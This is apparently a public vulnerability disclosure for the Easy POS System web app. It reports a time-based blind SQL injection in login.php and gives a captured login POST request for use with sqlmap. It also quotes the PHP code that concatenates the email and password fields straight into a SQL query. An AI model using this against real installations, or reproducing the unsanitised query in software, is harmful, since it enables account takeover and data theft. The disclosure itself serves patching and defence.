48 lines
3.1 KiB
Text
Executable file
48 lines
3.1 KiB
Text
Executable file
########################################################################################
|
||
[+] Exploit: Easy POS System - SQL Injection #
|
||
[+] Author: vinicius777 #
|
||
[+] Contact: vinicius777 [AT] gmail @vinicius777_ #
|
||
[+] Vendor Homepage: http://sourceforge.net/projects/easypossystem/ #
|
||
########################################################################################
|
||
|
||
|
||
[1] Sql Injection POST Time Based Blind
|
||
|
||
#Note: Time based Injection on POST requests using burp, as output indicated. You might use ‘sqlmap -l’ to load it though.
|
||
|
||
PoC:
|
||
|
||
POST /login.php HTTP/1.1
|
||
Host: localhost
|
||
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Referer: http://localhost/login.php
|
||
Cookie: __atuvc=3%7C3; res_session=5mYRbQ67qPN3Zx%2FH%2FPKLDcSgbu3FmjzVAfezt0G0Hapsi7GRhIzlauDhsVpWaAeOu8MAa2wkiyHTT%2BGemuchDNMd1kQYMKbXSp6MFx8BS6A05M%2FIxw0vP2XGGDE5iSzrDERGO6QQa4pOXRjpMD4aYL8%2BQPCj98JZrngcZnhoEFWekObo5EWdnnuhg8zpmWL26dMuzY9uPu%2BO60BwSiVU0CCrFKxc5lMkSH%2BE9%2FwxI4XQpVE%2Bb9X4StmPGMMiZ1it0mJcChZdz4Mku1WJcOrzLVN0RYZYIvARwBiMXdGf%2Bvpw%2F0MHPP09fBv0PRgNI4XAI9apbQ7RLlxK6LneiNaR0epLS1YQiRpucBxtI0AiKofvOK5THZM6KSenIxsqUsrSxtff6eic0prlZb%2Fvl%2B3unAIgFdcAREUhQZ6lytABxA3CRMuZUmb2lyU7cWb%2FnyhQ9BtCXtfSTrdJze6JIFxsFg%3D%3D; __utma=111872281.1068821941.1389863798.1389863798.1389863798.1; __utmz=111872281.1389863798.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sLogin=admin; bLicense53=true; ccss=2; ckPLC=YTo0OntzOjY6ImtleV9pZCI7czoyMzoiZjEzYTUwNDMxYTU5Njk2MDdiYWQxNzgiO3M6NzoidXNlcl9pZCI7czoxOiIxIjtzOjEwOiJ1c2VyX2FnZW50IjtzOjgxOiJNb3ppbGxhLzUuMCAoWDExOyBMaW51eCBpNjg2OyBydjoyMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzIyLjAgSWNld2Vhc2VsLzIyLjAiO3M6NzoibGFzdF9pcCI7czozOiI6OjEiO30%3D; ws_session=cbm4nhtn24jn9mhfvbjimjjl55; mySession_ID=rkc83o3o3e5df60aoocpb2bqb1; groupoffice=u8q9fb14k1jqvl0vtaidqr3va1; PHPSESSID=pk5053kt9fh1p1jm8kcvn6kh05; Loggedin=True; ICMSSESSION=r9hvp4g43vra6krgbrhmpdpb57; cunity_sess%2Fvar%2Fwww=khgb25qkkbocjd2q9dj4c8smh7; theme=15fde18a36dda46789cc971f08ead1d78bc9f55c%7Edefault; session=s4c5dj9pq24vk1b23ar59bnhs6; PHPAdvocat=1iko66spebalanv8teljc4ka26
|
||
Connection: keep-alive
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 54
|
||
|
||
emailid=admin%40admin.com&password=admin&submit=Submit
|
||
|
||
|
||
|
||
Vulnerable Code:
|
||
[+] login.php
|
||
|
||
|
||
if(isset($_POST['submit'])){
|
||
$emailid = stripslashes($_POST['emailid']);
|
||
$password = stripslashes($_POST['password']);
|
||
//echo "shop id = ".$shopid;
|
||
$sqlrec = "select * from users where emailid = '".$emailid."' and password = '".$password."'";
|
||
$resrec = mysql_query($sqlrec);
|
||
$rowuser = mysql_fetch_assoc($resrec);
|
||
|
||
|
||
|
||
|
||
#
|
||
#
|
||
# Greetz to g0tm1lk and TheColonial.
|